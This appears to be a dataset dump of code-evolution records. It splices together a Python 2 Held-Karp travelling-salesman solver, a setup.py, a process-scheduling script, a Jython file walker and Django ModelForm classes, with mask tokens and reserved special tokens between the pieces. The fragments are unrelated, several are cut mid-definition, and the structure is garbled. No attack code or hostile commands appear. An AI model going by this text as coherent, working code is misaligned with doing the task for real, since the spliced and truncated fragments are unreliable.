the implementations above, and then\n simply look up the value for f(0,0).\n\n With this approach, we use the dp table, the original `distance_matrix`\n and knowledge of the optimal cost to work backwards in determing what\n the optimal path was.\n \"\"\"\n d = distance_matrix\n n = len(d)\n dp = [[None for i in xrange(2 ** n)] for j in xrange(n)]\n for i in xrange(n):\n dp[i][(1 << n) - 1] = d[i][0]\n for visited in reversed(xrange((1 << n) - 1)):\n for i in xrange(n):\n min_dist = 
sys.maxint\n for j in xrange(n):\n if not 1 << j & visited:\n dist_j = d[i][j] + dp[j][visited | 1 << j]\n if dist_j < min_dist:\n min_dist = dist_j\n dp[i][visited] = min_dist\n ans = dp[0][1]\n path = [0]\n i, visited = 0, 1\n cost_from_i = dp[i][visited]\n while visited != (1 << n) - 1:\n for j in xrange(n):\n if not visited & 1 << j:\n cost_from_j = dp[j][visited | 1 << j]\n if abs(cost_from_i - cost_from_j - d[i][j]) < 0.001:\n path.append(j)\n i, visited = j, visited | 1 << j\n cost_from_i = cost_from_j\n break\n path.append(0)\n return ans, path\n\n\nclass Vertex:\n \"\"\" Simple implementation of a point in Euclidean space \"\"\"\n\n def __init__(self, x, y):\n self.x = float(x)\n self.y = float(y)\n\n\ndef distance(v1, v2):\n \"\"\" Euclidean distance between two `Vertex` instances \"\"\"\n return ((v1.x - v2.x) ** 2 + (v1.y - v2.y) ** 2) ** 0.5\n\n\ndef adjacency_matrix(graph):\n \"\"\"\n Construct the corresponding adjacency matrix from a list of verticies in a\n graph, assumed to be a complete graph.\n \"\"\"\n m = [[None for v in graph] for v in graph]\n for i in xrange(len(m)):\n for j in xrange(len(m[i])):\n m[i][j] = distance(graph[i], graph[j])\n return m\n\n\ndef main():\n g1 = [Vertex(0, 0), Vertex(4, 4), Vertex(4, 0), Vertex(0, 4)]\n m1 = adjacency_matrix(g1)\n for solver in (held_karp_recursive, held_karp_topdown, held_karp_bottomup):\n cost, path = solver(m1)\n assert cost == 16.0\n assert path == [0, 2, 1, 3, 0]\n g2 = [Vertex(0, 0), Vertex(4, 4), Vertex(0, 3), Vertex(4, 0), Vertex(1, 2)]\n m2 = adjacency_matrix(g2)\n for solver in (held_karp_recursive, held_karp_topdown, held_karp_bottomup):\n cost, path = solver(m2)\n assert abs(cost - 15.7733871) < 0.001\n assert path == [0, 3, 1, 2, 4, 0]\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "'''\nheld-karp.py\n\nImplementation of the Bellman-Held-Karp Algorithm to exactly solve TSPs,\nrequiring no external dependencies.\n\nIncludes a purely recursive implementation, as well as both top-down and\nbottom-up dynamic programming approaches.\n'''\nimport sys\n\n\ndef held_karp_recursive(distance_matrix):\n '''\n Solution to TSP using the Bellman-Held-Karp Algorithm\n\n Given the adjacency matrix to a corresponding tsp problem, find the\n minimum cost Hamiltonian cycle through the graph, as well as the\n corresponding path\n '''\n d = distance_matrix\n n = len(d)\n\n def f(i, visited, path_so_far):\n '''\n Let f(i, visited, path_so_far) be the path of minimum distance from\n city i to city 0, that passes through all remaining unvisited cities in\n `visited`, where visited is a bitmask such that the bit in the jth\n position being 1 represents city j having been visited, and bit j\n being 0 represents city j having not been visited, and `path_so_far` is\n the current path of minimum distance from city 0 up to city i.\n\n Then the solution we want is f(0, 0, []), and the following recursive\n relation holds:\n\n f(i, visited) = min_{j in unvisited} ( d(i,j) + f(j, visited | (1<<j)) )\n\n NOTE: Must be careful not to mutate\n '''\n # Base case: check if all cities have been visited\n if visited == (1 << n) - 1:\n # we have visited all cities, return to 0\n return d[i][0], path_so_far + [0,]\n\n min_dist = sys.maxint\n # visit all unvisited cities\n for j in xrange(n):\n if not (1 << j) & visited:\n dist_from_j, path_with_j = \\\n f(j, visited | (1 << j), path_so_far + [j,])\n # Distance with j\n dist_with_j = d[i][j] + dist_from_j\n if dist_with_j < min_dist:\n min_dist = dist_with_j\n min_path = path_with_j\n\n return min_dist, min_path\n\n return f(0, 0, [])\n\n\ndef held_karp_topdown(distance_matrix):\n '''\n Above algorithm, but making use of memoization to avoid recomputing\n overlapping subproblems\n '''\n d = distance_matrix\n n = len(d)\n\n 
'''\n We need a dp table that will store the minimum distances from city i\n to city 0 that passes through all unvisitied cities in the bit mask.\n There are n cities, and 2^n possible binary strings of length n, so our\n table will have dimensions n x 2^n\n\n With this approach, we use another table called 'child' that keeps track\n of the child city of i for each combination of (i, visited), and we can\n use this table to obtain the actual Hamiltonian cycle of minimum distance.\n '''\n dp = [[None for i in xrange(2**n)] for j in xrange(n)]\n child = [[None for i in xrange(2**n)] for j in xrange(n)]\n\n def f(i, visited):\n '''\n f is defined as in the purely recursive implementation above.\n The only difference here is that we check if the value we are\n looking for is already in the defined dp table, and we do not\n keep track of the path as we go along, as looking up a solution\n for any given value would require having stored the path for\n that solution as well, which would be expensive.\n\n As such, we use the `child` table to keep track of where we\n came from.\n '''\n # Check the table\n if dp[i][visited]:\n return dp[i][visited]\n # Base case: check if all cities have been visited\n if visited == (1 << n) - 1:\n # we have visited all cities, return to 0\n dp[i][visited] = d[i][0]\n child[i][visited] = 0\n return d[i][0]\n\n min_dist = sys.maxint\n chosen_j = None\n # visit all unvisited cities\n for j in xrange(n):\n if not (1 << j) & visited:\n dist_with_j = d[i][j] + f(j, (1 << j) | visited)\n if dist_with_j < min_dist:\n min_dist = dist_with_j\n chosen_j = j\n\n dp[i][visited] = min_dist\n child[i][visited] = chosen_j\n return min_dist\n\n # The value we are interested in\n ans = f(0,1)\n\n # Can optain the optimal path using the parent matrix\n path = [0]\n i, visited = 0, 1\n next_ = child[i][visited]\n while next_ is not None:\n path.append(next_)\n visited |= (1 << next_)\n next_ = child[next_][visited]\n\n return ans, path\n\n\ndef 
held_karp_bottomup(distance_matrix):\n '''\n In the bottom up implementation, we compute all possible solutions for the\n values `i` and `visited` as in the implementations above, and then\n simply look up the value for f(0,0).\n\n With this approach, we use the dp table, the original `distance_matrix`\n and knowledge of the optimal cost to work backwards in determing what\n the optimal path was.\n '''\n d = distance_matrix\n n = len(d)\n\n dp = [[None for i in xrange(2**n)] for j in xrange(n)]\n\n # Base case:\n # Distance from any city i back to 0 after having visited all cities\n for i in xrange(n):\n dp[i][(1<<n)-1] = d[i][0]\n\n # Fill in all values of the dp table, excluding the values from the\n # base case we've already inserted\n # Note we started with having visited all cities except for 0\n # and work backwards from there\n for visited in reversed(xrange((1<<n)-1)):\n for i in xrange(n):\n min_dist = sys.maxint\n for j in xrange(n):\n if not (1 << j) & visited:\n dist_j = d[i][j] + dp[j][visited | (1 << j)]\n if dist_j < min_dist:\n min_dist = dist_j\n dp[i][visited] = min_dist\n\n ans = dp[0][1]\n\n # We can also optain the optimal path working backwards using\n # the table and the knowledge of the cost of the optimal path\n path = [0]\n i, visited = 0, 1\n cost_from_i = dp[i][visited]\n while visited != (1 << n)-1:\n for j in xrange(n):\n if not visited & (1 << j):\n cost_from_j = dp[j][visited | (1 << j)]\n # require a tolerance for real valued distances\n if abs((cost_from_i - cost_from_j) - d[i][j]) < 0.001:\n # j was the city selected in the opt solution\n path.append(j)\n i, visited = j, visited | (1 << j)\n cost_from_i = cost_from_j\n break\n # We have visited all cities, so return to 0\n path.append(0)\n\n return ans, path\n\n\nclass Vertex:\n ''' Simple implementation of a point in Euclidean space '''\n def __init__(self, x, y):\n self.x = float(x)\n self.y = float(y)\n\n\ndef distance(v1, v2):\n ''' Euclidean distance between two `Vertex` 
instances '''\n return ((v1.x - v2.x)**2 + (v1.y - v2.y)**2)**0.5\n\n\ndef adjacency_matrix(graph):\n '''\n Construct the corresponding adjacency matrix from a list of verticies in a\n graph, assumed to be a complete graph.\n '''\n m = [[None for v in graph] for v in graph]\n for i in xrange(len(m)):\n for j in xrange(len(m[i])):\n m[i][j] = distance(graph[i], graph[j])\n return m\n\n\ndef main():\n\n ## Test cases\n\n # g1: (16.0, [0, 2, 1, 3, 0])\n g1 = [Vertex(0, 0), Vertex(4, 4), Vertex(4, 0), Vertex(0, 4)]\n m1 = adjacency_matrix(g1)\n for solver in held_karp_recursive, held_karp_topdown, held_karp_bottomup:\n cost, path = solver(m1)\n assert cost == 16.0\n assert path == [0, 2, 1, 3, 0]\n\n # g2: (15.773387165490545, [0, 3, 1, 2, 4, 0])\n g2 = [Vertex(0, 0), Vertex(4, 4), Vertex(0, 3), Vertex(4, 0), Vertex(1, 2)]\n m2 = adjacency_matrix(g2)\n for solver in held_karp_recursive, held_karp_topdown, held_karp_bottomup:\n cost, path = solver(m2)\n assert abs(cost - 15.7733871) < 0.001\n assert path == [0, 3, 1, 2, 4, 0]\n\n\nif __name__ == '__main__':\n main()\n",
"step-ids": [
5,
8,
9,
10,
12
]
}
|
[
5,
8,
9,
10,
12
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
setup(name='dragonfab', version='1.3.0', description='Fabric support',
author='Joel Pitt', author_email='joel@joelpitt.com', url=
'https://github.com/ferrouswheel/dragonfab', install_requires=['fabric',
'pip>=1.4', 'wheel'], packages=['dragonfab'])
<|reserved_special_token_1|>
from setuptools import setup
setup(name='dragonfab', version='1.3.0', description='Fabric support',
author='Joel Pitt', author_email='joel@joelpitt.com', url=
'https://github.com/ferrouswheel/dragonfab', install_requires=['fabric',
'pip>=1.4', 'wheel'], packages=['dragonfab'])
<|reserved_special_token_1|>
from setuptools import setup
setup(name = "dragonfab",
version = "1.3.0",
description = "Fabric support",
author = "Joel Pitt",
author_email = "joel@joelpitt.com",
url = "https://github.com/ferrouswheel/dragonfab",
install_requires = ['fabric', 'pip>=1.4', 'wheel'],
packages = ['dragonfab'],
)
|
flexible
|
{
"blob_id": "61135a10adefd6ba8ffd63e997fa91ce9c78de06",
"index": 6444,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nsetup(name='dragonfab', version='1.3.0', description='Fabric support',\n author='Joel Pitt', author_email='joel@joelpitt.com', url=\n 'https://github.com/ferrouswheel/dragonfab', install_requires=['fabric',\n 'pip>=1.4', 'wheel'], packages=['dragonfab'])\n",
"step-3": "from setuptools import setup\nsetup(name='dragonfab', version='1.3.0', description='Fabric support',\n author='Joel Pitt', author_email='joel@joelpitt.com', url=\n 'https://github.com/ferrouswheel/dragonfab', install_requires=['fabric',\n 'pip>=1.4', 'wheel'], packages=['dragonfab'])\n",
"step-4": "from setuptools import setup\n\nsetup(name = \"dragonfab\",\n version = \"1.3.0\",\n description = \"Fabric support\",\n author = \"Joel Pitt\",\n author_email = \"joel@joelpitt.com\",\n url = \"https://github.com/ferrouswheel/dragonfab\",\n install_requires = ['fabric', 'pip>=1.4', 'wheel'],\n packages = ['dragonfab'],\n)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import Individual
import Grupal
import matplotlib.pyplot as plt
import pandas as pd
plt.show()
|
normal
|
{
"blob_id": "bb1caf4d04c8a42279afa0ac586ced991e0dff84",
"index": 4574,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nplt.show()\n",
"step-3": "import Individual\nimport Grupal\nimport matplotlib.pyplot as plt\nimport pandas as pd\nplt.show()\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
class Process:
def __init__(self, id, at, bt):
self.id = id
self.at = at
self.bt = bt
self.wt = 0
self.ct = 0
self.st = 0
self.tat = 0
def fill(self, st):
print('Current process:', self.id)
self.st = st
self.ct = self.st + self.bt
self.tat = self.ct - self.at
self.wt = self.tat - self.bt
return self.ct
def print(self):
st = '\t'.join(map(str, [self.id, self.at, self.bt, self.ct, self.tat, self.wt]))
print(st)
@classmethod
def display(cls, process_list):
print('ID\tAT\tBT\tCT\tTAT\tWT')
for process in process_list:
process.print()
print('----------------------')
if __name__ == '__main__':
# n = int(input("Enter the number of processes: "))
# print("Enter the process and their details in the format ID AT BT")
l = [
[1, 5, 0],
[2, 3, 1],
[3, 8, 2],
[4, 6, 3],
]
n = len(l)
processes = []
for p in l:
processes.append(Process(*p))
# for i in range(n):
# processes.append(Process(random.randint(0, 10), random.randint(0, 10), random.randint(0, 10)))
# processes.append(Process(*[int(x.strip()) for x in input().split(' ')]))
Process.display(processes)
print('Sorting.')
processes.sort(key=lambda x: x.at)
Process.display(processes)
t = processes[0].at
for process in processes:
t = process.fill(max(t, process.at))
Process.display(processes)
Process.display(processes)
|
normal
|
{
"blob_id": "be58a2e0dcdbcb3a3df0da87be29ce7ebcee7fe9",
"index": 6185,
"step-1": "class Process:\n\n def __init__(self, id, at, bt):\n self.id = id\n self.at = at\n self.bt = bt\n self.wt = 0\n self.ct = 0\n self.st = 0\n self.tat = 0\n <mask token>\n <mask token>\n <mask token>\n\n\n<mask token>\n",
"step-2": "class Process:\n\n def __init__(self, id, at, bt):\n self.id = id\n self.at = at\n self.bt = bt\n self.wt = 0\n self.ct = 0\n self.st = 0\n self.tat = 0\n <mask token>\n\n def print(self):\n st = '\\t'.join(map(str, [self.id, self.at, self.bt, self.ct, self.\n tat, self.wt]))\n print(st)\n\n @classmethod\n def display(cls, process_list):\n print('ID\\tAT\\tBT\\tCT\\tTAT\\tWT')\n for process in process_list:\n process.print()\n print('----------------------')\n\n\n<mask token>\n",
"step-3": "class Process:\n\n def __init__(self, id, at, bt):\n self.id = id\n self.at = at\n self.bt = bt\n self.wt = 0\n self.ct = 0\n self.st = 0\n self.tat = 0\n\n def fill(self, st):\n print('Current process:', self.id)\n self.st = st\n self.ct = self.st + self.bt\n self.tat = self.ct - self.at\n self.wt = self.tat - self.bt\n return self.ct\n\n def print(self):\n st = '\\t'.join(map(str, [self.id, self.at, self.bt, self.ct, self.\n tat, self.wt]))\n print(st)\n\n @classmethod\n def display(cls, process_list):\n print('ID\\tAT\\tBT\\tCT\\tTAT\\tWT')\n for process in process_list:\n process.print()\n print('----------------------')\n\n\n<mask token>\n",
"step-4": "class Process:\n\n def __init__(self, id, at, bt):\n self.id = id\n self.at = at\n self.bt = bt\n self.wt = 0\n self.ct = 0\n self.st = 0\n self.tat = 0\n\n def fill(self, st):\n print('Current process:', self.id)\n self.st = st\n self.ct = self.st + self.bt\n self.tat = self.ct - self.at\n self.wt = self.tat - self.bt\n return self.ct\n\n def print(self):\n st = '\\t'.join(map(str, [self.id, self.at, self.bt, self.ct, self.\n tat, self.wt]))\n print(st)\n\n @classmethod\n def display(cls, process_list):\n print('ID\\tAT\\tBT\\tCT\\tTAT\\tWT')\n for process in process_list:\n process.print()\n print('----------------------')\n\n\nif __name__ == '__main__':\n l = [[1, 5, 0], [2, 3, 1], [3, 8, 2], [4, 6, 3]]\n n = len(l)\n processes = []\n for p in l:\n processes.append(Process(*p))\n Process.display(processes)\n print('Sorting.')\n processes.sort(key=lambda x: x.at)\n Process.display(processes)\n t = processes[0].at\n for process in processes:\n t = process.fill(max(t, process.at))\n Process.display(processes)\n Process.display(processes)\n",
"step-5": "class Process:\n def __init__(self, id, at, bt):\n self.id = id\n self.at = at\n self.bt = bt\n self.wt = 0\n self.ct = 0\n self.st = 0\n self.tat = 0\n\n def fill(self, st):\n print('Current process:', self.id)\n self.st = st\n self.ct = self.st + self.bt\n self.tat = self.ct - self.at\n self.wt = self.tat - self.bt\n return self.ct\n\n def print(self):\n st = '\\t'.join(map(str, [self.id, self.at, self.bt, self.ct, self.tat, self.wt]))\n print(st)\n\n @classmethod\n def display(cls, process_list):\n print('ID\\tAT\\tBT\\tCT\\tTAT\\tWT')\n for process in process_list:\n process.print()\n print('----------------------')\n\n\nif __name__ == '__main__':\n # n = int(input(\"Enter the number of processes: \"))\n # print(\"Enter the process and their details in the format ID AT BT\")\n l = [\n [1, 5, 0],\n [2, 3, 1],\n [3, 8, 2],\n [4, 6, 3],\n ]\n n = len(l)\n processes = []\n\n for p in l:\n processes.append(Process(*p))\n # for i in range(n):\n # processes.append(Process(random.randint(0, 10), random.randint(0, 10), random.randint(0, 10)))\n # processes.append(Process(*[int(x.strip()) for x in input().split(' ')]))\n Process.display(processes)\n print('Sorting.')\n processes.sort(key=lambda x: x.at)\n Process.display(processes)\n\n t = processes[0].at\n for process in processes:\n t = process.fill(max(t, process.at))\n Process.display(processes)\n\n Process.display(processes)\n",
"step-ids": [
2,
4,
5,
6,
7
]
}
|
[
2,
4,
5,
6,
7
] |
# Jython/Walk_comprehension.py
import os
restFiles = [os.path.join(d[0], f) for d in os.walk(".")
for f in d[2] if f.endswith(".java") and
"PythonInterpreter" in open(os.path.join(d[0], f)).read()]
for r in restFiles:
print(r)
|
normal
|
{
"blob_id": "61085eecc8fd0b70bc11e5a85c3958ba3b905eaf",
"index": 3118,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor r in restFiles:\n print(r)\n",
"step-3": "<mask token>\nrestFiles = [os.path.join(d[0], f) for d in os.walk('.') for f in d[2] if f\n .endswith('.java') and 'PythonInterpreter' in open(os.path.join(d[0], f\n )).read()]\nfor r in restFiles:\n print(r)\n",
"step-4": "import os\nrestFiles = [os.path.join(d[0], f) for d in os.walk('.') for f in d[2] if f\n .endswith('.java') and 'PythonInterpreter' in open(os.path.join(d[0], f\n )).read()]\nfor r in restFiles:\n print(r)\n",
"step-5": "# Jython/Walk_comprehension.py\nimport os\nrestFiles = [os.path.join(d[0], f) for d in os.walk(\".\")\n for f in d[2] if f.endswith(\".java\") and \n \"PythonInterpreter\" in open(os.path.join(d[0], f)).read()]\nfor r in restFiles:\n print(r)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class TblBlogForm(forms.ModelForm):
class Meta:
model = TblBlog
fields = ['blog_title', 'blog_description', 'blog_keyword',
'blog_content', 'blog_pics', 'blog_publish', 'blog_datetime',
'blog_summary', 'blog_like', 'blog_added_by']
<|reserved_special_token_0|>
class TblBlogCommentsForm(forms.ModelForm):
class Meta:
model = TblBlogComments
fields = '__all__'
class TblLearnDataForm(forms.ModelForm):
class Meta:
model = TblLearnData
fields = ['learn_data', 'learn_data_keyword',
'learn_data_description', 'learn_data_publish',
'learn_data_datetime', 'learn_data_added_by', 'learn_topics',
'learn_data_like', 'learn_data_icon']
def __init__(self, *args, **kwargs):
super(TblLearnDataForm, self).__init__(*args, **kwargs)
self.fields['learn_data_datetime'].widget = forms.HiddenInput()
self.fields['learn_data_added_by'].widget = forms.HiddenInput()
self.fields['learn_topics'].widget = forms.HiddenInput()
self.fields['learn_data_like'].widget = forms.HiddenInput()
self.fields['learn_data_icon'].widget = forms.HiddenInput()
self.fields['learn_data'].widget.attrs['placeholder'] = 'Title/Topics'
self.fields['learn_data_description'].widget.attrs['placeholder'
] = 'Brief Description'
self.fields['learn_data_keyword'].widget.attrs['placeholder'
] = 'Keyword For Search'
self.fields['learn_data_publish'].label = 'Publish'
class TblLearnDataCommentsForm(forms.ModelForm):
class Meta:
model = TblLearnDataComments
fields = '__all__'
class TblBlogGvpForm(forms.ModelForm):
class Meta:
model = TblBlogGvp
fields = '__all__'
class TblLearnDataGvpForm(forms.ModelForm):
class Meta:
model = TblLearnDataGvp
fields = '__all__'
class TblHomeForm(forms.ModelForm):
class Meta:
model = TblHome
fields = '__all__'
def __init__(self, *args, **kwargs):
super(TblHomeForm, self).__init__(*args, **kwargs)
self.fields['home_datetime'].widget = forms.HiddenInput()
self.fields['home_added_by'].widget = forms.HiddenInput()
self.fields['home_pics'].widget.attrs['placeholder'] = 'Upload Image'
self.fields['home_content'].widget.attrs['placeholder'] = 'Content'
self.fields['home_content_description'].widget.attrs['placeholder'
] = 'Description'
self.fields['home_publish'].label = 'Publish'
class TblAboutForm(forms.ModelForm):
class Meta:
model = TblAbout
fields = '__all__'
def __init__(self, *args, **kwargs):
super(TblAboutForm, self).__init__(*args, **kwargs)
self.fields['about_datetime'].widget = forms.HiddenInput()
self.fields['about_added_by'].widget = forms.HiddenInput()
self.fields['about_pics'].widget.attrs['placeholder'] = 'Upload Image'
self.fields['about_content'].widget.attrs['placeholder'] = 'Content'
self.fields['about_content_description'].widget.attrs['placeholder'
] = 'Description'
self.fields['about_publish'].label = 'Publish'
class TblLearnTopicsForm(forms.ModelForm):
class Meta:
model = TblLearnTopics
fields = '__all__'
def __init__(self, *args, **kwargs):
super(TblLearnTopicsForm, self).__init__(*args, **kwargs)
self.fields['learn_topics_datetime'].widget = forms.HiddenInput()
self.fields['learn_topics_icon'].widget.attrs['placeholder'] = 'Icon'
self.fields['learn_topics_coverpage_img'].widget = forms.HiddenInput()
self.fields['learn_topics'].widget.attrs['placeholder'] = 'Topics'
self.fields['learn_topics_description'].widget.attrs['placeholder'
] = 'Description'
self.fields['learn_topics_publish'].label = 'Publish'
def clean_learn_topics_added_by(self):
if not self.cleaned_data['learn_topics_added_by']:
return User()
return self.cleaned_data['learn_topics_added_by']
class TblSnippetTopicsForm(forms.ModelForm):
class Meta:
model = TblSnippetTopics
fields = '__all__'
def __init__(self, *args, **kwargs):
super(TblSnippetTopicsForm, self).__init__(*args, **kwargs)
self.fields['snippet_topics_datetime'].widget = forms.HiddenInput()
self.fields['snippet_topics_added_by'].widget = forms.HiddenInput()
self.fields['snippet_topics_icon'].widget = forms.HiddenInput()
self.fields['snippet_topics_coverpage_img'].widget = forms.HiddenInput(
)
self.fields['snippet_topics_expire'].widget = forms.HiddenInput()
self.fields['snippet_topics'].widget.attrs['placeholder'] = 'Topics'
self.fields['snippet_topics_description'].widget.attrs['placeholder'
] = 'Description'
self.fields['snippet_topics_publish'].label = 'Publish'
def clean_snippet_topics_added_by(self):
if not self.cleaned_data['snippet_topics_added_by']:
return User()
return self.cleaned_data['snippet_topics_added_by']
class TblQueriesForm(forms.ModelForm):
class Meta:
model = TblQueries
fields = '__all__'
def __init__(self, *args, **kwargs):
super(TblQueriesForm, self).__init__(*args, **kwargs)
self.fields['datetime'].widget = forms.HiddenInput()
self.fields['name'].widget.attrs['placeholder'] = 'Name'
self.fields['email'].widget.attrs['placeholder'] = 'Email'
self.fields['subject'].widget.attrs['placeholder'] = 'Subject'
self.fields['message'].widget.attrs['placeholder'] = 'Message'
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TblBlogForm(forms.ModelForm):
class Meta:
model = TblBlog
fields = ['blog_title', 'blog_description', 'blog_keyword',
'blog_content', 'blog_pics', 'blog_publish', 'blog_datetime',
'blog_summary', 'blog_like', 'blog_added_by']
def __init__(self, *args, **kwargs):
super(TblBlogForm, self).__init__(*args, **kwargs)
self.fields['blog_datetime'].widget = forms.HiddenInput()
self.fields['blog_summary'].widget = forms.HiddenInput()
self.fields['blog_like'].widget = forms.HiddenInput()
self.fields['blog_added_by'].widget = forms.HiddenInput()
self.fields['blog_title'].widget.attrs['placeholder'] = 'Title/Topics'
self.fields['blog_description'].widget.attrs['placeholder'
] = 'Brief Description'
self.fields['blog_content'].widget.attrs['placeholder'
] = 'Blog Content'
self.fields['blog_keyword'].widget.attrs['placeholder'
] = 'Keyword For Search'
self.fields['blog_pics'].widget.attrs['placeholder'] = 'Upload Pics'
self.fields['blog_publish'].label = 'Publish'
class TblBlogCommentsForm(forms.ModelForm):
class Meta:
model = TblBlogComments
fields = '__all__'
class TblLearnDataForm(forms.ModelForm):
class Meta:
model = TblLearnData
fields = ['learn_data', 'learn_data_keyword',
'learn_data_description', 'learn_data_publish',
'learn_data_datetime', 'learn_data_added_by', 'learn_topics',
'learn_data_like', 'learn_data_icon']
def __init__(self, *args, **kwargs):
super(TblLearnDataForm, self).__init__(*args, **kwargs)
self.fields['learn_data_datetime'].widget = forms.HiddenInput()
self.fields['learn_data_added_by'].widget = forms.HiddenInput()
self.fields['learn_topics'].widget = forms.HiddenInput()
self.fields['learn_data_like'].widget = forms.HiddenInput()
self.fields['learn_data_icon'].widget = forms.HiddenInput()
self.fields['learn_data'].widget.attrs['placeholder'] = 'Title/Topics'
self.fields['learn_data_description'].widget.attrs['placeholder'
] = 'Brief Description'
self.fields['learn_data_keyword'].widget.attrs['placeholder'
] = 'Keyword For Search'
self.fields['learn_data_publish'].label = 'Publish'
class TblLearnDataCommentsForm(forms.ModelForm):
class Meta:
model = TblLearnDataComments
fields = '__all__'
class TblBlogGvpForm(forms.ModelForm):
class Meta:
model = TblBlogGvp
fields = '__all__'
class TblLearnDataGvpForm(forms.ModelForm):
class Meta:
model = TblLearnDataGvp
fields = '__all__'
class TblHomeForm(forms.ModelForm):
class Meta:
model = TblHome
fields = '__all__'
def __init__(self, *args, **kwargs):
super(TblHomeForm, self).__init__(*args, **kwargs)
self.fields['home_datetime'].widget = forms.HiddenInput()
self.fields['home_added_by'].widget = forms.HiddenInput()
self.fields['home_pics'].widget.attrs['placeholder'] = 'Upload Image'
self.fields['home_content'].widget.attrs['placeholder'] = 'Content'
self.fields['home_content_description'].widget.attrs['placeholder'
] = 'Description'
self.fields['home_publish'].label = 'Publish'
class TblAboutForm(forms.ModelForm):
class Meta:
model = TblAbout
fields = '__all__'
def __init__(self, *args, **kwargs):
super(TblAboutForm, self).__init__(*args, **kwargs)
self.fields['about_datetime'].widget = forms.HiddenInput()
self.fields['about_added_by'].widget = forms.HiddenInput()
self.fields['about_pics'].widget.attrs['placeholder'] = 'Upload Image'
self.fields['about_content'].widget.attrs['placeholder'] = 'Content'
self.fields['about_content_description'].widget.attrs['placeholder'
] = 'Description'
self.fields['about_publish'].label = 'Publish'
class TblLearnTopicsForm(forms.ModelForm):
class Meta:
model = TblLearnTopics
fields = '__all__'
def __init__(self, *args, **kwargs):
super(TblLearnTopicsForm, self).__init__(*args, **kwargs)
self.fields['learn_topics_datetime'].widget = forms.HiddenInput()
self.fields['learn_topics_icon'].widget.attrs['placeholder'] = 'Icon'
self.fields['learn_topics_coverpage_img'].widget = forms.HiddenInput()
self.fields['learn_topics'].widget.attrs['placeholder'] = 'Topics'
self.fields['learn_topics_description'].widget.attrs['placeholder'
] = 'Description'
self.fields['learn_topics_publish'].label = 'Publish'
def clean_learn_topics_added_by(self):
if not self.cleaned_data['learn_topics_added_by']:
return User()
return self.cleaned_data['learn_topics_added_by']
class TblSnippetTopicsForm(forms.ModelForm):
class Meta:
model = TblSnippetTopics
fields = '__all__'
def __init__(self, *args, **kwargs):
super(TblSnippetTopicsForm, self).__init__(*args, **kwargs)
self.fields['snippet_topics_datetime'].widget = forms.HiddenInput()
self.fields['snippet_topics_added_by'].widget = forms.HiddenInput()
self.fields['snippet_topics_icon'].widget = forms.HiddenInput()
self.fields['snippet_topics_coverpage_img'].widget = forms.HiddenInput(
)
self.fields['snippet_topics_expire'].widget = forms.HiddenInput()
self.fields['snippet_topics'].widget.attrs['placeholder'] = 'Topics'
self.fields['snippet_topics_description'].widget.attrs['placeholder'
] = 'Description'
self.fields['snippet_topics_publish'].label = 'Publish'
def clean_snippet_topics_added_by(self):
if not self.cleaned_data['snippet_topics_added_by']:
return User()
return self.cleaned_data['snippet_topics_added_by']
class TblQueriesForm(forms.ModelForm):
class Meta:
model = TblQueries
fields = '__all__'
def __init__(self, *args, **kwargs):
super(TblQueriesForm, self).__init__(*args, **kwargs)
self.fields['datetime'].widget = forms.HiddenInput()
self.fields['name'].widget.attrs['placeholder'] = 'Name'
self.fields['email'].widget.attrs['placeholder'] = 'Email'
self.fields['subject'].widget.attrs['placeholder'] = 'Subject'
self.fields['message'].widget.attrs['placeholder'] = 'Message'
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TblSnippetDataForm(forms.ModelForm):
class Meta:
model = TblSnippetData
fields = ['snippet_topics', 'snippet_data_subject',
'snippet_data_description', 'snippet_data_keyword',
'snippet_data_code', 'snippet_data_datetime',
'snippet_data_added_by', 'snippet_topics', 'snippet_data_publish']
def clean_snippet_topics_added_by(self):
if not self.cleaned_data['snippet_topics_added_by']:
return User()
return self.cleaned_data['snippet_topics_added_by']
def __init__(self, *args, **kwargs):
super(TblSnippetDataForm, self).__init__(*args, **kwargs)
self.fields['snippet_data_datetime'].widget = forms.HiddenInput()
self.fields['snippet_data_added_by'].widget = forms.HiddenInput()
self.fields['snippet_topics'].widget = forms.HiddenInput()
self.fields['snippet_data_subject'].widget.attrs['placeholder'
] = 'Title/Topics'
self.fields['snippet_data_description'].widget.attrs['placeholder'
] = 'Brief Description'
self.fields['snippet_data_keyword'].widget.attrs['placeholder'
] = 'Keyword For Search'
self.fields['snippet_data_code'].widget.attrs['placeholder'
] = 'Snippet (Code)'
self.fields['snippet_data_publish'].widget.attrs['placeholder'
] = 'Ready-To-Publish'
self.fields['snippet_data_publish'].label = 'Publish'
class TblBlogForm(forms.ModelForm):
class Meta:
model = TblBlog
fields = ['blog_title', 'blog_description', 'blog_keyword',
'blog_content', 'blog_pics', 'blog_publish', 'blog_datetime',
'blog_summary', 'blog_like', 'blog_added_by']
def __init__(self, *args, **kwargs):
super(TblBlogForm, self).__init__(*args, **kwargs)
self.fields['blog_datetime'].widget = forms.HiddenInput()
self.fields['blog_summary'].widget = forms.HiddenInput()
self.fields['blog_like'].widget = forms.HiddenInput()
self.fields['blog_added_by'].widget = forms.HiddenInput()
self.fields['blog_title'].widget.attrs['placeholder'] = 'Title/Topics'
self.fields['blog_description'].widget.attrs['placeholder'
] = 'Brief Description'
self.fields['blog_content'].widget.attrs['placeholder'
] = 'Blog Content'
self.fields['blog_keyword'].widget.attrs['placeholder'
] = 'Keyword For Search'
self.fields['blog_pics'].widget.attrs['placeholder'] = 'Upload Pics'
self.fields['blog_publish'].label = 'Publish'
class TblBlogCommentsForm(forms.ModelForm):
class Meta:
model = TblBlogComments
fields = '__all__'
class TblLearnDataForm(forms.ModelForm):
class Meta:
model = TblLearnData
fields = ['learn_data', 'learn_data_keyword',
'learn_data_description', 'learn_data_publish',
'learn_data_datetime', 'learn_data_added_by', 'learn_topics',
'learn_data_like', 'learn_data_icon']
def __init__(self, *args, **kwargs):
